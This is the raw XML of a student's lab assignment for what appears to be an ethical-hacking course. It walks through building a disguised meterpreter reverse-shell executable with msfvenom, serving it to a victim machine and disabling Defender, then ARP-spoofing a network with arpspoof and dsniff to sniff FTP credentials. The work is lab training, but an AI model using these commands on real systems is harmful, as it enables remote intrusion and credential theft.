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F664" w14:textId="4F37E78E" w:rsidR="006858C7" w:rsidRDefault="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F76CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Assignment Day 6 | 30th August 2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E22F55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Question 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103EC359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● Create payload for windows .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D8DD49" w14:textId="77777777" w:rsidR="00F76CE3" w:rsidRP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● Transfer the payload to the victim's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB2228" w14:textId="0699718B" w:rsidR="00F76CE3" w:rsidRDefault="00F76CE3" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F76CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>● Exploit the victim's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A59E1D" w14:textId="5326917C" w:rsidR="00F76CE3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>Commands :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A825EE" w14:textId="716FBD28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>Attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EC3F2A" w14:textId="1E308D6B" w:rsidR="00594B8D" w:rsidRPr="00594B8D" w:rsidRDefault="00594B8D" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594B8D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=9999 -f exe -o upgrade.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ADFB0B" w14:textId="78E4DF88" w:rsidR="00594B8D" w:rsidRP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service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F606F65" w14:textId="1C3EB037" w:rsidR="00594B8D" w:rsidRP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mv upgrade.exe /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFAE4C1" w14:textId="4DBBE91E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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEB12CB" w14:textId="103B0822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use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B3C73C" w14:textId="50D3AF6D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payload windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FDD04C" w14:textId="00E359BD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LHOST 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF64BED" w14:textId="6AA1EAE8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set LPORT 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BDC1D6" w14:textId="08AB150F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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2653919B" w14:textId="27CAB006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>Victim machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF8E74" w14:textId="6356DCF6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 xml:space="preserve">Open browser </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1667B2A5" w14:textId="587702B6" w:rsidR="00594B8D" w:rsidRDefault="00594B8D" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Goto : 10.0.2.15/upgrade.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AFEC9C" w14:textId="222F88A4" w:rsidR="00594B8D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t>Download the file and and before running it disable windows defender then run file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ECFC4F" w14:textId="1CB68FAA" w:rsidR="006832D6" w:rsidRDefault="00594B8D" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>We have successfully got</w:t>
      </w:r>
      <w:r w:rsidR="006832D6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> our session in the attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1499D08D" w14:textId="22B22807" w:rsidR="00594B8D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7AA122" wp14:editId="6C3243CF">
            <wp:extent cx="6283586" cy="3086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396" cy="30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B8D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B66205" w14:textId="15904210" w:rsidR="006832D6" w:rsidRDefault="006832D6" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A430AD2" w14:textId="5902FE2B" w:rsidR="006832D6" w:rsidRDefault="006832D6" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DD9654" w14:textId="4955BCE6" w:rsidR="006832D6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3CA5B5" wp14:editId="4018556E">
            <wp:extent cx="6396879" cy="31318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12" cy="313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288" w14:textId="02026007" w:rsidR="006832D6" w:rsidRDefault="006832D6" w:rsidP="00F76C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CF09FE1" wp14:editId="1737B0CE">
            <wp:extent cx="6259617" cy="30708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81" cy="30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8184" w14:textId="10EB4FB1" w:rsidR="00594B8D" w:rsidRDefault="00594B8D" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A74DD3D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Question 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10583E03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● Create an FTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244FAC31" w14:textId="77777777" w:rsidR="006832D6" w:rsidRP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● Access FTP server from windows command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CFF0F" w14:textId="18990645" w:rsidR="006832D6" w:rsidRDefault="006832D6" w:rsidP="006832D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>● Do an mitm and username and password of FTP transaction using wireshark and dsniff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192516B" w14:textId="1B3451E4" w:rsidR="006832D6" w:rsidRDefault="006832D6" w:rsidP="006832D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7DA477" w14:textId="225C05A3" w:rsidR="006832D6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Goto server manager in the machine in which we want to host the ftp server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266CF52C" w14:textId="1D802D1C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Goto manage and select add roles and features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594F446A" w14:textId="1FE81D9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 xml:space="preserve">Click next until you reach server roles and in server roles </w:t>
      </w:r>
      <w:r w:rsidRPr="00F544AA">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>select web Server(IIS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169D3488" w14:textId="717B2DA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Click next and then click install in the last screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D948F55" w14:textId="73AAEF55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Wait for installation to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC9746" w14:textId="68F50D55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In the other windows machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D5770" w14:textId="7818F870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Open command promt and check if both the machine are on the same network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FFC5C3" w14:textId="68128C78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Attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A49234A" w14:textId="77777777" w:rsidR="00D738E9" w:rsidRDefault="00D738E9" w:rsidP="006832D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>apt-get install dsniff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA0AFD" w14:textId="77777777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other tab:&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>arpspoof -i eth0 -t 10.0.2.15 -r 10.0.2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704943D8" w14:textId="77777777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other tab:&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dsniff -I eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA3C657" w14:textId="1261AF3F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other tab:&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE7C390" w14:textId="488CBB2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Doing ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F5D5DC" w14:textId="67BD4275" w:rsidR="00D738E9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Doing ftp in other windows machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A0F55" w14:textId="479C48DF" w:rsidR="00F544AA" w:rsidRDefault="00F544AA" w:rsidP="006832D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>In command promt : &gt;</w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00D738E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>ftp 10.0.2.15</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15569488" w14:textId="72C12E45" w:rsidR="00F544AA" w:rsidRDefault="00D738E9" w:rsidP="006832D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Enter user as harry and P/W for harry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565161D" w14:textId="58C52703" w:rsidR="00F544AA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D3505C" wp14:editId="0408983E">
            <wp:extent cx="6103620" cy="434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471" cy="43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98A" w14:textId="12E03B8B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CEB77AC" wp14:editId="2734E7E1">
            <wp:extent cx="6312754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38" cy="327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006A" w14:textId="346F85FC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85714B" wp14:editId="41BC086A">
            <wp:extent cx="6293999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5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402" cy="3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EB64" w14:textId="45447BB6" w:rsidR="00D738E9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806B9BD" wp14:editId="2D70A27F">
            <wp:extent cx="6333390" cy="3093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196" cy="30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C49D" w14:textId="2DFF68BC" w:rsidR="00D738E9" w:rsidRPr="006832D6" w:rsidRDefault="00D738E9" w:rsidP="006832D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61B8DB" wp14:editId="3B3FF03C">
            <wp:extent cx="6331170" cy="312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913" cy="31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29E7" w14:textId="5E4DCB1D" w:rsidR="006832D6" w:rsidRDefault="006832D6" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6976065A" w14:textId="6FDE9D55" w:rsidR="00A57986" w:rsidRDefault="00A57986" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A46C2A2" w14:textId="17A5AB54" w:rsidR="00A57986" w:rsidRDefault="00A57986" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49AA6D43" w14:textId="2A2E8293" w:rsidR="00A57986" w:rsidRDefault="00A57986" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5A71DB" w14:textId="7741EBF1" w:rsidR="00A57986" w:rsidRDefault="00A57986" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Submitted by : Shubham Prakash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370581A0" w14:textId="48082F68" w:rsidR="00B720A8" w:rsidRPr="00594B8D" w:rsidRDefault="00B720A8" w:rsidP="00F76CE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(Codepotato)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B720A8" w:rsidRPr="0059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1B"/>
    <w:rsid w:val="004A751B"/>
    <w:rsid w:val="00594B8D"/>
    <w:rsid w:val="006832D6"/>
    <w:rsid w:val="006858C7"/>
    <w:rsid w:val="00A53EE4"/>
    <w:rsid w:val="00A57986"/>
    <w:rsid w:val="00B720A8"/>
    <w:rsid w:val="00D738E9"/>
    <w:rsid w:val="00F544AA"/>
    <w:rsid w:val="00F7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9F9B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0E8E45F1-E7EB-4A9B-90E2-1691B248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Guest User</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-02T08:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-02T08:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>